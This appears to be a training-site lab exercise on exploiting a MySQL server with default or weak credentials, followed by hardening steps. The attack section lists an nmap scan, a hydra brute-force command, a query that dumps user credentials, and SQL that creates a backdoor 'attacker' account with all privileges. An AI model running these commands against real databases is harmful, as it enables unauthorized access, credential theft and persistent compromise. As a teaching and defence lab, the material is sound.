Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 28: Exploiting Unsecured MySQL Database with Weak Credentials

by | May 22, 2025 | 0 comments

Objective: Exploit a MySQL database with weak or default credentials to escalate privileges or access sensitive data, and learn how to secure MySQL configurations to prevent such vulnerabilities.

Scenario: MySQL is a widely used relational database management system. Weak or default credentials, such as root:root, can allow attackers to gain unauthorized access to databases. Once inside, attackers can enumerate data, escalate privileges, or extract sensitive information. Your task is to identify such vulnerabilities, exploit them, and secure the database.

Lab Setup

  1. Environment:
    • A Linux system running MySQL with a vulnerable configuration.
    • Weak or default credentials enabled for testing.
  2. Tools Required:
    • mysql client for database interaction.
    • nmap for network scanning.

Lab Steps

Step 1: Identify MySQL Services

  1. Scan the target system for MySQL services using nmap: nmap -p 3306 --script=mysql-enum <target_ip>
    • Replace <target_ip> with the IP address of the target system.
    • Example output: 3306/tcp open mysql | mysql-enum: | Accounts: | root: no password
  2. Verify that port 3306 (default MySQL port) is open and accessible.

Step 2: Attempt to Log In

  1. Log in to the MySQL database using default credentials: mysql -u root -p -h <target_ip>
    • When prompted for a password, press Enter (if no password is set).
  2. If default credentials fail, attempt weak passwords using a brute-force tool like hydra: hydra -L users.txt -P passwords.txt <target_ip> mysql

Step 3: Enumerate and Exploit the Database

  1. Once logged in, enumerate databases: SHOW DATABASES;
  2. Select a database and list its tables: USE <database_name>; SHOW TABLES;
  3. Extract sensitive information, such as user credentials: SELECT * FROM users;
    • Look for columns like username, password, or email.

Step 4: Escalate Privileges

  1. Check user privileges: SELECT user, host, super_priv FROM mysql.user;
    • Identify users with SUPER privileges or administrative rights.
  2. Add a new administrative user: CREATE USER 'attacker'@'%' IDENTIFIED BY 'password'; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' WITH GRANT OPTION;
  3. Log in with the new credentials to verify access: mysql -u attacker -p -h <target_ip>

Solution

Explanation:

  • Weak or default MySQL credentials can be exploited to gain unauthorized access.
  • Attackers can enumerate databases, extract sensitive data, and escalate privileges.

Prevention:

  1. Set Strong Passwords:
    • Update the MySQL root password: ALTER USER 'root'@'localhost' IDENTIFIED BY 'StrongPassword123!';
  2. Disable Remote Root Login:
    • Restrict root access to localhost: UPDATE mysql.user SET host='localhost' WHERE user='root'; FLUSH PRIVILEGES;
  3. Restrict User Privileges:
    • Assign the least privileges required for each user. REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'user'@'%';
  4. Enable Firewall Rules:
    • Restrict access to port 3306 from trusted IPs only: sudo ufw allow from <trusted_ip> to any port 3306
  5. Audit Database Activity:
    • Monitor logs for suspicious queries: sudo tail -f /var/log/mysql/mysql.log

Testing and Verification

  1. Re-attempt to log in with default or weak credentials to confirm they are disabled.
  2. Verify that root login is restricted to localhost.
  3. Test user privileges to ensure no unauthorized access is allowed.

Reflection

This exercise demonstrates the risks of unsecured MySQL configurations and how attackers can exploit them. By identifying vulnerabilities and applying mitigations, you’ve gained practical experience in securing database systems.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *